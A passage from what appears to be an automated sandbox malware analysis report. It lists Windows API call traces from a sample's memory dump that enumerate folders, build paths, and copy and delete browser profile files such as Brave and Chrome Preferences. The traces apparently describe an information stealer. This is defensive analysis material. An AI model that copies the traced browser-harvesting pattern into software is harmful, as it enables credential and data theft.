                              • lstrcat.KERNEL32(00000000,\*.*), ref: 0039199A
                                • Part of subcall function 003B4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 003B406D
                                • Part of subcall function 003B4040: lstrcpy.KERNEL32(00000000,?), ref: 003B40A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003919C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391A0E
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391A16
                              • lstrlen.KERNEL32(003C1794), ref: 00391A21
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391A41
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391A4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391A76
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391A81
                              • lstrlen.KERNEL32(003C1794), ref: 00391A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391AAC
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391AB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391ADE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391AE9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391B11
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00391B45
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 00391B70
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 00391B8A
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391BC4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391BFB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391C03
                              • lstrlen.KERNEL32(003C1794), ref: 00391C0E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391C31
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391C3D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391C69
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391C74
                              • lstrlen.KERNEL32(003C1794), ref: 00391C7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391CA2
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391CAE
                              • lstrlen.KERNEL32(?), ref: 00391CBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391CDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00391CE9
                              • lstrlen.KERNEL32(003C1794), ref: 00391CF4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391D14
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391D20
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391D46
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391D51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391D7D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391DE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391DEB
                              • lstrlen.KERNEL32(003C1794), ref: 00391DF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391E19
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391E25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391E4B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391E56
                              • lstrlen.KERNEL32(003C1794), ref: 00391E61
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391E81
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391E8D
                              • lstrlen.KERNEL32(?), ref: 00391E9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391EBA
                              • lstrcat.KERNEL32(00000000,?), ref: 00391EC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391EF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391F3E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00391F45
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391F9F
                              • lstrlen.KERNEL32(00F28A28), ref: 00391FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00391FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00391FE3
                              • lstrlen.KERNEL32(003C1794), ref: 00391FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039200E
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00392042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039204D
                              • lstrlen.KERNEL32(003C1794), ref: 00392058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00392075
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00392081
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                              • String ID: \*.*
                              • API String ID: 4127656590-1173974218
                              • Opcode ID: 14fada988c1e13469dc93ac90d93506d3651ef2fe4b47f4be73e7691171b6cf8
                              • Instruction ID: dd5b51f2e0ed7f9c1e467a6ba917308ba3be589c513f201c384b9c29a1afc4e0
                              • Opcode Fuzzy Hash: 14fada988c1e13469dc93ac90d93506d3651ef2fe4b47f4be73e7691171b6cf8
                              • Instruction Fuzzy Hash: 56925B31912A1BAFCF23AFA4DD89EAF77B9AF54700F054124F805AB251DB349D15CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DBEF
                              • lstrlen.KERNEL32(003C4CA8), ref: 0039DBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC17
                              • lstrcat.KERNEL32(00000000,003C4CA8), ref: 0039DC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DC4C
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DC8F
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 0039DCD0
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 0039DCF0
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 0039DD0A
                              • lstrlen.KERNEL32(003BCFEC), ref: 0039DD1D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039DD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DD7B
                              • lstrlen.KERNEL32(003C1794), ref: 0039DD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDA3
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DDAF
                              • lstrlen.KERNEL32(?), ref: 0039DDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 0039DDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DE19
                              • lstrlen.KERNEL32(003C1794), ref: 0039DE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039DE6F
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DE7B
                              • lstrlen.KERNEL32(00F28BB8), ref: 0039DE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DEBB
                              • lstrlen.KERNEL32(003C1794), ref: 0039DEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039DEE6
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DEF2
                              • lstrlen.KERNEL32(00F28A78), ref: 0039DF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFA5
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039DFB1
                              • lstrlen.KERNEL32(00F28BB8), ref: 0039DFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039DFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039DFF4
                              • lstrlen.KERNEL32(003C1794), ref: 0039DFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E022
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 0039E02E
                              • lstrlen.KERNEL32(00F28A78), ref: 0039E03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 0039E06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 0039E0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 0039E0E7
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E11F
                              • lstrlen.KERNEL32(00F2DB70), ref: 0039E12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E155
                              • lstrcat.KERNEL32(00000000,?), ref: 0039E15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E19F
                              • lstrcat.KERNEL32(00000000), ref: 0039E1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E1F9
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E22F
                              • lstrlen.KERNEL32(00F28A28), ref: 0039E23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E261
                              • lstrcat.KERNEL32(00000000,00F28A28), ref: 0039E269
                              • lstrlen.KERNEL32(\Brave\Preferences), ref: 0039E274
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E29B
                              • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0039E2A7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E2CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E30F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E349
                              • DeleteFileA.KERNEL32(?), ref: 0039E381
                              • StrCmpCA.SHLWAPI(?,00F2D960), ref: 0039E3AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E3F4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E41C
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E445
                              • StrCmpCA.SHLWAPI(?,00F28A78), ref: 0039E468
                              • StrCmpCA.SHLWAPI(?,00F28BB8), ref: 0039E47D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E4D9
                              • GetFileAttributesA.KERNEL32(00000000), ref: 0039E4E0
                              • StrCmpCA.SHLWAPI(?,00F2D8E8), ref: 0039E58E
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 0039E5C4
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0039E639
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E678
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E6A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E6C7
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E70E
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E737
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E75C
                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0039E776
                              • DeleteFileA.KERNEL32(?), ref: 0039E7D2
                              • StrCmpCA.SHLWAPI(?,00F28998), ref: 0039E7FC
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E88C
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E8B5
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E8EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039E916
                              • lstrcpy.KERNEL32(00000000,?), ref: 0039E952
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 2635522530-726946144
                              • Opcode ID: be1916b1bc629050a6bdcab0b119c1a20dd2f8ebde12ef6143830a13b87f3ece
                              • Instruction ID: 43d79c37a9653b4f5796dc08d26186ed0c8f16b9f7dbd8dd2d8260346c405859
                              • Opcode Fuzzy Hash: be1916b1bc629050a6bdcab0b119c1a20dd2f8ebde12ef6143830a13b87f3ece
                              • Instruction Fuzzy Hash: 47925F7191161AAFCF22EFA4DC8AEAF77B9AF54300F054528F846AB251DB34DC45CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A18D2
                              • lstrlen.KERNEL32(\*.*), ref: 003A18DD
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A18FF
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 003A190B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1932
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A1947
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A1967
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A1981
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A19BF
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A19F2
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A1A1A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1A25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A4C
                              • lstrlen.KERNEL32(003C1794), ref: 003A1A5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A80
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AB4
                              • lstrlen.KERNEL32(?), ref: 003A1AC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AE5
                              • lstrcat.KERNEL32(00000000,?), ref: 003A1AF3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B19
                              • lstrlen.KERNEL32(00F28968), ref: 003A1B2F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B59
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1B64
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B8F
                              • lstrlen.KERNEL32(003C1794), ref: 003A1BA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1BC3
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1BCF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1BF8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C25
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1C30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C57
                              • lstrlen.KERNEL32(003C1794), ref: 003A1C69
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C8B
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1C97
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CEF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1CFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D21
                              • lstrlen.KERNEL32(003C1794), ref: 003A1D33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D55
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1D61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DB9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A1DC4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DED
                              • lstrlen.KERNEL32(003C1794), ref: 003A1E19
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E36
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1E42
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E68
                              • lstrlen.KERNEL32(00F2DA20), ref: 003A1E7E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EB2
                              • lstrlen.KERNEL32(003C1794), ref: 003A1EC6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EE3
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1EEF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F15
                              • lstrlen.KERNEL32(00F2E3F8), ref: 003A1F2B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F5F
                              • lstrlen.KERNEL32(003C1794), ref: 003A1F73
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F90
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A1F9C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1FC2
                              • lstrlen.KERNEL32(00F1A900), ref: 003A1FD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2000
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A200B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2036
                              • lstrlen.KERNEL32(003C1794), ref: 003A2048
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2067
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A2073
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2098
                              • lstrlen.KERNEL32(?), ref: 003A20AC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A20D0
                              • lstrcat.KERNEL32(00000000,?), ref: 003A20DE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2103
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A213F
                              • lstrlen.KERNEL32(00F2DB70), ref: 003A214E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2176
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A2181
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                              • String ID: \*.*
                              • API String ID: 712834838-1173974218
                              • Opcode ID: 2d3dae082ef6da405c10618a8e07db7546130bd19051b67074e5b1b17bc45e2b
                              • Instruction ID: afe61adb01873c9f32c7238108e3b51f9d9a09accf43fb207d7be4c6c0ef178a
                              • Opcode Fuzzy Hash: 2d3dae082ef6da405c10618a8e07db7546130bd19051b67074e5b1b17bc45e2b
                              • Instruction Fuzzy Hash: FC623D31912A16AFCB23AB64CC49EBF77B9EF55700F0A0128F805AB251DB34DD15DBA0
                              APIs
                              • wsprintfA.USER32 ref: 003A392C
                              • FindFirstFileA.KERNEL32(?,?), ref: 003A3943
                              • StrCmpCA.SHLWAPI(?,003C17A0), ref: 003A396C
                              • StrCmpCA.SHLWAPI(?,003C17A4), ref: 003A3986
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A39BF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A39E7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A39F2
                              • lstrlen.KERNEL32(003C1794), ref: 003A39FD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A1A
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3A26
                              • lstrlen.KERNEL32(?), ref: 003A3A33
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A53
                              • lstrcat.KERNEL32(00000000,?), ref: 003A3A61
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3A8A
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A3ACE
                              • lstrlen.KERNEL32(?), ref: 003A3AD8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B05
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3B10
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B36
                              • lstrlen.KERNEL32(003C1794), ref: 003A3B48
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B6A
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3B76
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3B9E
                              • lstrlen.KERNEL32(?), ref: 003A3BB2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3BD2
                              • lstrcat.KERNEL32(00000000,?), ref: 003A3BE0
                              • lstrlen.KERNEL32(00F28A28), ref: 003A3C0B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3C31
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3C3C
                              • lstrlen.KERNEL32(00F28968), ref: 003A3C5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3C84
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3C8F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3CB7
                              • lstrlen.KERNEL32(003C1794), ref: 003A3CC9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3CE8
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3CF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3D1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 003A3D47
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3D52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3D79
                              • lstrlen.KERNEL32(003C1794), ref: 003A3D8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3DAD
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3DB9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3DE2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E11
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3E1C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E43
                              • lstrlen.KERNEL32(003C1794), ref: 003A3E55
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3E77
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3E83
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3EAC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3EDB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A3EE6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F0D
                              • lstrlen.KERNEL32(003C1794), ref: 003A3F1F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F41
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 003A3F4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3F75
                              • lstrlen.KERNEL32(?), ref: 003A3F89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3FA9
                              • lstrcat.KERNEL32(00000000,?), ref: 003A3FB7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A3FE0
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A401F
                              • lstrlen.KERNEL32(00F2DB70), ref: 003A402E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A4056
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A4061
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A408A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A40CE
                              • lstrcat.KERNEL32(00000000), ref: 003A40DB
                              • FindNextFileA.KERNEL32(00000000,?), ref: 003A42D9
                              • FindClose.KERNEL32(00000000), ref: 003A42E8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
